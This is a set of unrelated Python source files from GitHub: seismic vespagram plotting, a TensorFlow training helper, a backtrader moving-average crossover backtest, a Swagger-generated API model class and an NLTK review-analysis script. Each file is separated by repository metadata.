P, S, BAZ, PRED_BAZ_X, PRED_BAZ_Y, PRED_AZ_X, PRED_AZ_Y, DIST, TIME = predictions[row, :][0]
# make the box around the prediction to search over
smin=float(S)-2
smax=float(S)+6
s_step=0.1
# filter
st = st.filter('bandpass', freqmin=fmin, freqmax=fmax,
corners=4, zerophase=True)
# get the traces and phase traces
Traces = c.get_traces(st)
Phase_traces = c.get_phase_traces(st)
# get sampling rate
sampling_rate=st[0].stats.sampling_rate
# slowness vespagrams
vesp_lin = Vespagram_Lin(traces=Traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, baz=float(BAZ), smin=smin, smax=smax, s_space=s_step)
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(211)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_lin, ymin=smin, ymax=smax, y_space=s_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Slow - Lin", predictions=predictions, type='slow',
envelope=True)
vesp_pws = Vespagram_PWS(traces=Traces, phase_traces=Phase_traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, baz=float(BAZ), smin=smin, smax=smax, s_space=s_step, degree=2)
ax = fig.add_subplot(212)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_pws, ymin=smin, ymax=smax, y_space=s_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Slow - PWS", predictions=predictions, type='slow',
envelope=True)
plt.tight_layout()
plt.show()
# backazimuth vespagrams
bmin=float(BAZ)-30
bmax=float(BAZ)+30
b_step=0.05
vesp_lin = Baz_vespagram_Lin(traces=Traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, slow=float(S), bmin=bmin, bmax=bmax, b_space=b_step)
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(211)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_lin, ymin=bmin, ymax=bmax, y_space=b_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Baz - Lin", predictions=predictions, type='baz',
envelope=True)
vesp_pws = Baz_vespagram_PWS(traces=Traces, phase_traces=Phase_traces, sampling_rate=sampling_rate, geometry=geometry,
distance=mean_dist, slow=float(S), bmin=bmin, bmax=bmax, b_space=b_step, degree=2)
ax = fig.add_subplot(212)
p = plotting(ax = ax)
p.plot_vespagram(vespagram=vesp_pws, ymin=bmin, ymax=bmax, y_space=b_step, tmin=min_target, tmax=max_target,
sampling_rate=sampling_rate, title="Baz - PWS", predictions=predictions, npeaks=5, type='baz',
envelope=True)
plt.tight_layout()
plt.show()
|
eejwa/Array_Seis_Circle
|
examples/Vespagram_test.py
|
Vespagram_test.py
|
py
| 4,213 |
python
|
en
|
code
| 7 |
github-code
|
6
|
72344006587
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import datasets
import utils
FLAGS = tf.flags.FLAGS
def get_lr(global_step, base_lr, steps_per_epoch, # pylint: disable=missing-docstring
decay_epochs, lr_decay_factor, warmup_epochs):
warmup_lr = 0.0
if warmup_epochs > 0:
warmup_lr = (tf.cast(global_step, tf.float32) *
(base_lr / (warmup_epochs * steps_per_epoch)))
normal_lr = tf.train.piecewise_constant(
global_step,
[e * steps_per_epoch for e in decay_epochs],
[base_lr * (lr_decay_factor ** i) for i in range(len(decay_epochs) + 1)]
)
lr = tf.cond(tf.less(global_step, warmup_epochs * steps_per_epoch),
lambda: warmup_lr,
lambda: normal_lr)
return lr
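# Illustrative arithmetic (example values, not from the original code): with base_lr=0.1,
# steps_per_epoch=100, decay_epochs=[30, 60], lr_decay_factor=0.1 and warmup_epochs=5, the learning
# rate ramps linearly from 0 to 0.1 over the first 500 steps, stays at 0.1 until step 3000, drops
# to 0.01 until step 6000, and is 0.001 afterwards.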
# TODO(akolesnikov): add more logging
class Trainer(object):
"""Base trainer class."""
def __init__(self,
update_batchnorm_params=True):
self.update_batchnorm_params = update_batchnorm_params
split = FLAGS.get_flag_value('train_split', 'train')
num_samples = datasets.get_count(split)
steps_per_epoch = num_samples // FLAGS.batch_size
global_step = tf.train.get_or_create_global_step()
self.global_step_inc = tf.assign_add(global_step, 1)
    # lr_scale_batch_size defines a canonical batch size that is coupled with
    # the initial learning rate. If the actual batch size is not the same as
    # the canonical one, then the learning rate is linearly scaled. This is very convenient
    # as it allows varying the batch size without recomputing the learning rate.
lr_factor = 1.0
if FLAGS.get_flag_value('lr_scale_batch_size', 0):
lr_factor = FLAGS.batch_size / float(FLAGS.lr_scale_batch_size)
deps = FLAGS.get_flag_value('decay_epochs', None)
decay_epochs = utils.str2intlist(deps) if deps else [FLAGS.epochs]
self.lr = get_lr(
global_step,
base_lr=FLAGS.lr * lr_factor,
steps_per_epoch=steps_per_epoch,
decay_epochs=decay_epochs,
lr_decay_factor=FLAGS.get_flag_value('lr_decay_factor', 0.1),
warmup_epochs=FLAGS.get_flag_value('warmup_epochs', 0))
# TODO(marvinritter): Re-enable summaries with support for TPU training.
# tf.summary.scalar('learning_rate', self.lr)
def get_train_op(self, loss, # pylint: disable=missing-docstring
var_list=None,
add_reg_loss=True,
use_tpu=False):
if add_reg_loss:
l2_loss = tf.reduce_sum(tf.losses.get_regularization_losses())
loss += l2_loss
optimizer = FLAGS.get_flag_value('optimizer', 'sgd')
if optimizer == 'sgd':
optimizer = tf.train.MomentumOptimizer(learning_rate=self.lr,
momentum=0.9)
elif optimizer == 'adam':
optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)
else:
raise ValueError('Unknown optimizer: %s' % optimizer)
if use_tpu:
# Wrap optimizer in CrossShardOptimizer which takes care of
# synchronizing the weight updates between TPU cores.
optimizer = tf.contrib.tpu.CrossShardOptimizer(optimizer)
opt_step = optimizer.minimize(loss, var_list=var_list,
colocate_gradients_with_ops=True)
if self.update_batchnorm_params:
opt_step = tf.group([opt_step] +
tf.get_collection(tf.GraphKeys.UPDATE_OPS))
opt_step = tf.group([opt_step, self.global_step_inc])
return opt_step
def make_estimator(mode, loss=None, eval_metrics=None, predictions=None):
"""Returns an EstimatorSpec (maybe TPU) for all modes."""
# Always use TPUEstimator, even when not using TPU, then it's (almost) no-op.
spec_type = tf.contrib.tpu.TPUEstimatorSpec
if mode == tf.estimator.ModeKeys.PREDICT:
assert predictions is not None, 'Need to pass `predict` arg.'
return spec_type(mode=mode, predictions=predictions)
if mode == tf.estimator.ModeKeys.EVAL:
return spec_type(mode=mode, loss=loss, eval_metrics=eval_metrics)
if mode == tf.estimator.ModeKeys.TRAIN:
assert loss is not None, 'Need to pass `loss` arg.'
trainer = Trainer(update_batchnorm_params=True)
train_op = trainer.get_train_op(loss, use_tpu=FLAGS.use_tpu)
return spec_type(mode=mode, loss=loss, train_op=train_op)
raise ValueError('Unsupported mode %s' % mode)
|
google/revisiting-self-supervised
|
trainer.py
|
trainer.py
|
py
| 4,425 |
python
|
en
|
code
| 349 |
github-code
|
6
|
6605463296
|
from itertools import combinations
from collections import Counter
def solution(orders, course):
answer = []
for c in course:
temp = []
for order in orders:
combi = combinations(sorted(order), c)
temp += combi
counter = Counter(temp)
if len(counter) != 0 and max(counter.values()) != 1:
for cnt in counter:
if counter[cnt] == max(counter.values()):
answer.append("".join(cnt))
return sorted(answer)
|
JeongGod/Algo-study
|
3people/6week/p72411.py
|
p72411.py
|
py
| 457 |
python
|
en
|
code
| 7 |
github-code
|
6
|
17532275577
|
import backtrader as bt
import backtrader.analyzers as btanalyzers
import matplotlib
import matplotlib.dates as mdates
from matplotlib import pyplot as plt
from datetime import datetime
import pandas as pd
import datetime as dt
# Create a subclass of Strategy to define the indicators and logic
class SMA_CrossStrategy(bt.Strategy):
def __init__(self):
ma_fast = bt.ind.SMA(period = 9)
ma_slow = bt.ind.SMA(period = 21)
self.crossover = bt.ind.CrossOver(ma_fast, ma_slow)
def next(self):
if not self.position:
if self.crossover > 0:
self.buy()
elif self.crossover < 0:
self.close()
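    # Summary of the rule above: go long on the 9/21 SMA golden cross when flat and flatten the
    # position on the death cross; this variant is long-only, while the commented-out next()
    # below sketches an alternative that also opens short positions.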
# def next(self):
# if not self.position:
# if self.crossover > 0:
# self.buy()
# elif self.crossover < 0:
# self.sell()
# elif self.crossover < 0:
# self.close()
def main():
cerebro = bt.Cerebro()
tickers_list = ['AAPL']
df_tic = pd.read_hdf("datasets/df_SnP_500_ohlcv.h5", "df", mode = 'r')
df_tic = df_tic[df_tic['tic'].isin(tickers_list)]
df_tic = df_tic.set_index('date')
# df_tic['date'] = pd.to_datetime(df_tic['date'])
print(df_tic.head(5))
data = bt.feeds.PandasData(dataname = df_tic,
# datetime=None,
open =1,
high=2,
low=3,
close=4,
volume=6,
openinterest=-1,
timeframe = bt.TimeFrame.Days,
fromdate=dt.datetime(2023, 1, 1), # Specify the start date
todate=dt.datetime(2023, 8, 24), # Specify the end date
)
# data = bt.feeds.YahooFinanceData(dataname = 'AAPL', fromdate = datetime(2010, 1, 1), todate = datetime(2020, 1, 1))
cerebro.adddata(data)
cerebro.addstrategy(SMA_CrossStrategy)
cerebro.broker.setcash(10000.0)
cerebro.addsizer(bt.sizers.PercentSizer, percents = 100)
cerebro.addanalyzer(btanalyzers.SharpeRatio, _name = "sharpe")
cerebro.addanalyzer(btanalyzers.Transactions, _name = "trans")
cerebro.addanalyzer(btanalyzers.TradeAnalyzer, _name = "trades")
back = cerebro.run()
cerebro.broker.getvalue()
back[0].analyzers.sharpe.get_analysis()
back[0].analyzers.trans.get_analysis()
back[0].analyzers.trades.get_analysis()
cerebro.plot(style='candlestick', barup='green', bardown='red')
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gcf().autofmt_xdate() # Rotates the date labels for better visibility
if __name__=="__main__":
main()
|
erkundanec/Trading_Strategies
|
04_Backtest_Backtrader_SMA_CrossOver.py
|
04_Backtest_Backtrader_SMA_CrossOver.py
|
py
| 3,013 |
python
|
en
|
code
| 0 |
github-code
|
6
|
26246786176
|
import argparse
import logging
from typing import List
import torch
import torch.nn as nn
from .probe_base import ProbeBase
logger = logging.getLogger(__name__)
class OneWordNNProbe(ProbeBase):
"""
    Computes the squared L2 norm of each of n word representations as its depth after an MLP projection.
    Can be used for probing the depth of words in a parse tree.
"""
def __init__(
self, model_hidden_dim: int, probe_hidden_layers: int, intermediate_dim: int
):
logging.info("Constructing OneWordNNDepthProbe")
super(OneWordNNProbe, self).__init__()
initial_linear = nn.Linear(model_hidden_dim, intermediate_dim)
intermediate_layers: List[nn.Module] = []
for i in range(probe_hidden_layers):
intermediate_layers.append(nn.Linear(intermediate_dim, intermediate_dim))
if i != probe_hidden_layers - 1:
intermediate_layers.append(nn.ReLU())
self.nn_probe = nn.Sequential(initial_linear, nn.ReLU(), *intermediate_layers)
def forward(self, batch):
"""
        Computes the squared L2 norm of each of n words as its depth after an MLP projection,
        for each sentence in a batch. Predicts the depth through an MLP.
Args:
batch: a batch of word representations of the shape
(batch_size, max_seq_len, representation_dim)
Returns: A tensor of depths of shape (batch_size, max_seq_len)
"""
batch = self.nn_probe(batch)
batchlen, seqlen, rank = batch.size()
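        # bmm of each token vector viewed as (1 x rank) with itself viewed as (rank x 1) yields the
        # token's squared L2 norm, which is interpreted as its predicted depth.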
norms = torch.bmm(
batch.view(batchlen * seqlen, 1, rank),
batch.view(batchlen * seqlen, rank, 1),
)
norms = norms.view(batchlen, seqlen)
return norms
@staticmethod
def add_probe_specific_args(
parent_parser: argparse.ArgumentParser,
) -> argparse.ArgumentParser:
parser = parent_parser.add_argument_group("ProbeArgs")
parser.add_argument(
"--probe_hidden_layers",
type=int,
default=2,
help="Number of laers in probe.",
)
parser.add_argument(
"--intermediate_dim",
type=int,
default=300,
help="Dimension the probe maps embeddings to.",
)
return parent_parser
|
VSJMilewski/multimodal-probes
|
probing_project/probes/one_word_nn_probe.py
|
one_word_nn_probe.py
|
py
| 2,291 |
python
|
en
|
code
| 10 |
github-code
|
6
|
19849966124
|
#7.7.1.py
# This program calculates weekly wages from the hourly rate and the number of hours worked per week
def main():
print("This program gives wages earned in a week period.")
rate = float(input("What is the hourly rate? "))
numberHours = float(input("How many hours were worked? "))
# determines if overtime pay is included
if numberHours > 40:
pay = (numberHours-40) * (rate * 1.5) + 40 * rate
print(f"The total wages are {pay} dollars")
elif numberHours <= 40:
pay = numberHours * rate
print(f"The total wages are {pay} dollars")
else:
print("Something went wrong")
if __name__ == '__main__':
main()
|
mochapup/Python-Programming-2nd-edition-John-Zelle
|
7.7.1.py
|
7.7.1.py
|
py
| 661 |
python
|
en
|
code
| 1 |
github-code
|
6
|
43573832015
|
import argparse
from experiment.monitor import monitor
from apps.qe import qe
if __name__ == '__main__':
parser = argparse.ArgumentParser()
monitor.setup_run_args(parser)
qe.setup_run_args(parser)
args, extra_args = parser.parse_known_args()
app_conf = qe.QuantumEspressoAppConf(args.node_count, args.benchmark_name)
monitor.launch(app_conf=app_conf, args=args,
experiment_cli_args=extra_args)
|
geopm/geopm
|
integration/experiment/monitor/run_monitor_qe.py
|
run_monitor_qe.py
|
py
| 440 |
python
|
en
|
code
| 79 |
github-code
|
6
|
17233943864
|
# coding: utf-8
"""
Refinery Calc API Documentation
Integrate the powerful Refinery Calc Engine into your process using this API. # noqa: E501
OpenAPI spec version: 1.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class OutputTypes(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'balance': 'list[OutputDetails]',
'complexity': 'list[OutputDetails]',
'constraints': 'list[OutputDetails]',
'crude_names': 'list[OutputDetails]',
'crude_percent': 'list[OutputDetails]',
'crude_pricing': 'list[OutputDetails]',
'crude_quality': 'list[OutputDetails]',
'crudes_and_feeds': 'list[OutputDetails]',
'delete_category': 'list[OutputDetails]',
'economics': 'list[OutputDetails]',
'end_points_f': 'list[OutputDetails]',
'expense_factors': 'list[OutputDetails]',
'fcc_hydrk_conv': 'list[OutputDetails]',
'feeds_pricing': 'list[OutputDetails]',
'gasoline_blending': 'list[OutputDetails]',
'general': 'list[OutputDetails]',
'hydrogen': 'list[OutputDetails]',
'product_pricing': 'list[OutputDetails]',
'products': 'list[OutputDetails]',
'refinery_layout_svg': 'list[OutputDetails]',
'sustainability': 'list[OutputDetails]',
'unit_balance': 'list[OutputDetails]'
}
attribute_map = {
'balance': 'balance',
'complexity': 'complexity',
'constraints': 'constraints',
'crude_names': 'crudeNames',
'crude_percent': 'crudePercent',
'crude_pricing': 'crudePricing',
'crude_quality': 'crudeQuality',
'crudes_and_feeds': 'crudesAndFeeds',
'delete_category': 'deleteCategory',
'economics': 'economics',
'end_points_f': 'endPointsF',
'expense_factors': 'expenseFactors',
'fcc_hydrk_conv': 'fccHydrkConv',
'feeds_pricing': 'feedsPricing',
'gasoline_blending': 'gasolineBlending',
'general': 'general',
'hydrogen': 'hydrogen',
'product_pricing': 'productPricing',
'products': 'products',
'refinery_layout_svg': 'refineryLayoutSVG',
'sustainability': 'sustainability',
'unit_balance': 'unitBalance'
}
def __init__(self, balance=None, complexity=None, constraints=None, crude_names=None, crude_percent=None, crude_pricing=None, crude_quality=None, crudes_and_feeds=None, delete_category=None, economics=None, end_points_f=None, expense_factors=None, fcc_hydrk_conv=None, feeds_pricing=None, gasoline_blending=None, general=None, hydrogen=None, product_pricing=None, products=None, refinery_layout_svg=None, sustainability=None, unit_balance=None): # noqa: E501
"""OutputTypes - a model defined in Swagger""" # noqa: E501
self._balance = None
self._complexity = None
self._constraints = None
self._crude_names = None
self._crude_percent = None
self._crude_pricing = None
self._crude_quality = None
self._crudes_and_feeds = None
self._delete_category = None
self._economics = None
self._end_points_f = None
self._expense_factors = None
self._fcc_hydrk_conv = None
self._feeds_pricing = None
self._gasoline_blending = None
self._general = None
self._hydrogen = None
self._product_pricing = None
self._products = None
self._refinery_layout_svg = None
self._sustainability = None
self._unit_balance = None
self.discriminator = None
if balance is not None:
self.balance = balance
if complexity is not None:
self.complexity = complexity
if constraints is not None:
self.constraints = constraints
if crude_names is not None:
self.crude_names = crude_names
if crude_percent is not None:
self.crude_percent = crude_percent
if crude_pricing is not None:
self.crude_pricing = crude_pricing
if crude_quality is not None:
self.crude_quality = crude_quality
if crudes_and_feeds is not None:
self.crudes_and_feeds = crudes_and_feeds
if delete_category is not None:
self.delete_category = delete_category
if economics is not None:
self.economics = economics
if end_points_f is not None:
self.end_points_f = end_points_f
if expense_factors is not None:
self.expense_factors = expense_factors
if fcc_hydrk_conv is not None:
self.fcc_hydrk_conv = fcc_hydrk_conv
if feeds_pricing is not None:
self.feeds_pricing = feeds_pricing
if gasoline_blending is not None:
self.gasoline_blending = gasoline_blending
if general is not None:
self.general = general
if hydrogen is not None:
self.hydrogen = hydrogen
if product_pricing is not None:
self.product_pricing = product_pricing
if products is not None:
self.products = products
if refinery_layout_svg is not None:
self.refinery_layout_svg = refinery_layout_svg
if sustainability is not None:
self.sustainability = sustainability
if unit_balance is not None:
self.unit_balance = unit_balance
@property
def balance(self):
"""Gets the balance of this OutputTypes. # noqa: E501
:return: The balance of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._balance
@balance.setter
def balance(self, balance):
"""Sets the balance of this OutputTypes.
:param balance: The balance of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._balance = balance
@property
def complexity(self):
"""Gets the complexity of this OutputTypes. # noqa: E501
:return: The complexity of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._complexity
@complexity.setter
def complexity(self, complexity):
"""Sets the complexity of this OutputTypes.
:param complexity: The complexity of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._complexity = complexity
@property
def constraints(self):
"""Gets the constraints of this OutputTypes. # noqa: E501
:return: The constraints of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._constraints
@constraints.setter
def constraints(self, constraints):
"""Sets the constraints of this OutputTypes.
:param constraints: The constraints of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._constraints = constraints
@property
def crude_names(self):
"""Gets the crude_names of this OutputTypes. # noqa: E501
:return: The crude_names of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_names
@crude_names.setter
def crude_names(self, crude_names):
"""Sets the crude_names of this OutputTypes.
:param crude_names: The crude_names of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_names = crude_names
@property
def crude_percent(self):
"""Gets the crude_percent of this OutputTypes. # noqa: E501
:return: The crude_percent of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_percent
@crude_percent.setter
def crude_percent(self, crude_percent):
"""Sets the crude_percent of this OutputTypes.
:param crude_percent: The crude_percent of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_percent = crude_percent
@property
def crude_pricing(self):
"""Gets the crude_pricing of this OutputTypes. # noqa: E501
:return: The crude_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_pricing
@crude_pricing.setter
def crude_pricing(self, crude_pricing):
"""Sets the crude_pricing of this OutputTypes.
:param crude_pricing: The crude_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_pricing = crude_pricing
@property
def crude_quality(self):
"""Gets the crude_quality of this OutputTypes. # noqa: E501
:return: The crude_quality of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crude_quality
@crude_quality.setter
def crude_quality(self, crude_quality):
"""Sets the crude_quality of this OutputTypes.
:param crude_quality: The crude_quality of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crude_quality = crude_quality
@property
def crudes_and_feeds(self):
"""Gets the crudes_and_feeds of this OutputTypes. # noqa: E501
:return: The crudes_and_feeds of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._crudes_and_feeds
@crudes_and_feeds.setter
def crudes_and_feeds(self, crudes_and_feeds):
"""Sets the crudes_and_feeds of this OutputTypes.
:param crudes_and_feeds: The crudes_and_feeds of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._crudes_and_feeds = crudes_and_feeds
@property
def delete_category(self):
"""Gets the delete_category of this OutputTypes. # noqa: E501
:return: The delete_category of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._delete_category
@delete_category.setter
def delete_category(self, delete_category):
"""Sets the delete_category of this OutputTypes.
:param delete_category: The delete_category of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._delete_category = delete_category
@property
def economics(self):
"""Gets the economics of this OutputTypes. # noqa: E501
:return: The economics of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._economics
@economics.setter
def economics(self, economics):
"""Sets the economics of this OutputTypes.
:param economics: The economics of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._economics = economics
@property
def end_points_f(self):
"""Gets the end_points_f of this OutputTypes. # noqa: E501
:return: The end_points_f of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._end_points_f
@end_points_f.setter
def end_points_f(self, end_points_f):
"""Sets the end_points_f of this OutputTypes.
:param end_points_f: The end_points_f of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._end_points_f = end_points_f
@property
def expense_factors(self):
"""Gets the expense_factors of this OutputTypes. # noqa: E501
:return: The expense_factors of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._expense_factors
@expense_factors.setter
def expense_factors(self, expense_factors):
"""Sets the expense_factors of this OutputTypes.
:param expense_factors: The expense_factors of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._expense_factors = expense_factors
@property
def fcc_hydrk_conv(self):
"""Gets the fcc_hydrk_conv of this OutputTypes. # noqa: E501
:return: The fcc_hydrk_conv of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._fcc_hydrk_conv
@fcc_hydrk_conv.setter
def fcc_hydrk_conv(self, fcc_hydrk_conv):
"""Sets the fcc_hydrk_conv of this OutputTypes.
:param fcc_hydrk_conv: The fcc_hydrk_conv of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._fcc_hydrk_conv = fcc_hydrk_conv
@property
def feeds_pricing(self):
"""Gets the feeds_pricing of this OutputTypes. # noqa: E501
:return: The feeds_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._feeds_pricing
@feeds_pricing.setter
def feeds_pricing(self, feeds_pricing):
"""Sets the feeds_pricing of this OutputTypes.
:param feeds_pricing: The feeds_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._feeds_pricing = feeds_pricing
@property
def gasoline_blending(self):
"""Gets the gasoline_blending of this OutputTypes. # noqa: E501
:return: The gasoline_blending of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._gasoline_blending
@gasoline_blending.setter
def gasoline_blending(self, gasoline_blending):
"""Sets the gasoline_blending of this OutputTypes.
:param gasoline_blending: The gasoline_blending of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._gasoline_blending = gasoline_blending
@property
def general(self):
"""Gets the general of this OutputTypes. # noqa: E501
:return: The general of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._general
@general.setter
def general(self, general):
"""Sets the general of this OutputTypes.
:param general: The general of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._general = general
@property
def hydrogen(self):
"""Gets the hydrogen of this OutputTypes. # noqa: E501
:return: The hydrogen of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._hydrogen
@hydrogen.setter
def hydrogen(self, hydrogen):
"""Sets the hydrogen of this OutputTypes.
:param hydrogen: The hydrogen of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._hydrogen = hydrogen
@property
def product_pricing(self):
"""Gets the product_pricing of this OutputTypes. # noqa: E501
:return: The product_pricing of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._product_pricing
@product_pricing.setter
def product_pricing(self, product_pricing):
"""Sets the product_pricing of this OutputTypes.
:param product_pricing: The product_pricing of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._product_pricing = product_pricing
@property
def products(self):
"""Gets the products of this OutputTypes. # noqa: E501
:return: The products of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._products
@products.setter
def products(self, products):
"""Sets the products of this OutputTypes.
:param products: The products of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._products = products
@property
def refinery_layout_svg(self):
"""Gets the refinery_layout_svg of this OutputTypes. # noqa: E501
:return: The refinery_layout_svg of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._refinery_layout_svg
@refinery_layout_svg.setter
def refinery_layout_svg(self, refinery_layout_svg):
"""Sets the refinery_layout_svg of this OutputTypes.
:param refinery_layout_svg: The refinery_layout_svg of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._refinery_layout_svg = refinery_layout_svg
@property
def sustainability(self):
"""Gets the sustainability of this OutputTypes. # noqa: E501
:return: The sustainability of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._sustainability
@sustainability.setter
def sustainability(self, sustainability):
"""Sets the sustainability of this OutputTypes.
:param sustainability: The sustainability of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._sustainability = sustainability
@property
def unit_balance(self):
"""Gets the unit_balance of this OutputTypes. # noqa: E501
:return: The unit_balance of this OutputTypes. # noqa: E501
:rtype: list[OutputDetails]
"""
return self._unit_balance
@unit_balance.setter
def unit_balance(self, unit_balance):
"""Sets the unit_balance of this OutputTypes.
:param unit_balance: The unit_balance of this OutputTypes. # noqa: E501
:type: list[OutputDetails]
"""
self._unit_balance = unit_balance
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(OutputTypes, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, OutputTypes):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
refinerycalc/sdk-example-python
|
python/refinerycalc/models/output_types.py
|
output_types.py
|
py
| 19,790 |
python
|
en
|
code
| 0 |
github-code
|
6
|
6173790975
|
import csv
import sqlite3
import numpy as np
import pandas as pd
import re
from nltk.stem.porter import *
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import string
from PIL import Image
from os import path
import matplotlib.pyplot as plt
import matplotlib as mpl
import pickle
from sklearn.svm import LinearSVC
from sklearn.feature_extraction.text import TfidfVectorizer
from wordcloud import WordCloud, STOPWORDS
from collections import Counter
from nltk.stem import SnowballStemmer
from nltk.stem import WordNetLemmatizer
stemmer = SnowballStemmer('english')
wordnet_lemmatizer = WordNetLemmatizer()
#############################In/out############################
def open_file(csvfile):
reader = pd.read_csv(csvfile)
return reader
def output_file(df,string):
df.to_csv(string, index = False)
#############################Word Cloud & Feature Extraction############################
def text_process(data):
'''
Takes in a df in format of [text,stars] performs the following:
1. Lower capital letters
2. Remove all punctuation
3. Remove all stopwords
4. Reduce words to their word stem
5. Return a list of words
'''
for i in range(len(data)):
line = data[i]
line = line.lower() # lower case
translation = str.maketrans("", "", string.punctuation);
line = line.translate(translation)
split = word_tokenize(line)
# filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)
filtered = []
for token in split:
if re.search('[a-zA-Z]', token):
filtered.append(token)
word = [i for i in filtered if i not in stopwords.words('english')]
d = [stemmer.stem(word) for word in word]
d = [wordnet_lemmatizer.lemmatize(word) for word in d]
data[i] = d
return data
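# Illustrative call of text_process (hypothetical review text; the exact stems
# depend on the NLTK stemmer/lemmatizer versions installed):
#   text_process(["The staff were friendly and helpful!"])
#   -> [['staff', 'friend', 'help']]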
def top_words(business_id,review_ml ):
    train = review_ml[(review_ml['business_id'] == business_id) &
                      (review_ml['True(1)/Deceptive(0)'] == 'True')]
text = list(train['Review']) # text
text = text_process(text)
text = sum(text, [])
counts = Counter(text)
wordcloud = WordCloud(
background_color='white',
max_words=100,
max_font_size=50,
min_font_size=10,
random_state=40,
).fit_words(counts)
fig = plt.figure(1)
plt.imshow(wordcloud)
plt.axis('off') # remove axis
plt.show()
def change_label(x):
for i in range(len(x)):
if x[i] >= 3.0: # good review: stars >=3.0
x[i] = 1
else: # bad review: stars 3.0
x[i] = 0
return x
def bigram(business_id, review_ml):
# only use true review
train0 = review_ml[review_ml['business_id'] == business_id]
train = train0[train0['True(1)/Deceptive(0)'] == 'True']
#print(train.head())
#train_data = list(train['Review']) # text
label = list(train['Stars']) # ratings
#print(label)
train_label = change_label(label)
#print(train_label)
# TfidfVectorizer Transform
transformer = TfidfVectorizer(stop_words='english',
ngram_range=(2, 2)) # "ignore terms that appear in less than 1% of the documents".
#print(transformer)
cvectorizer = transformer.fit(train['Review'])
#print(cvectorizer)
transformed = cvectorizer.transform(train['Review'])
#print(transformed)
# SVM regression
clf = LinearSVC()
clf.fit(transformed, train_label)
coefficients = clf.coef_.ravel()
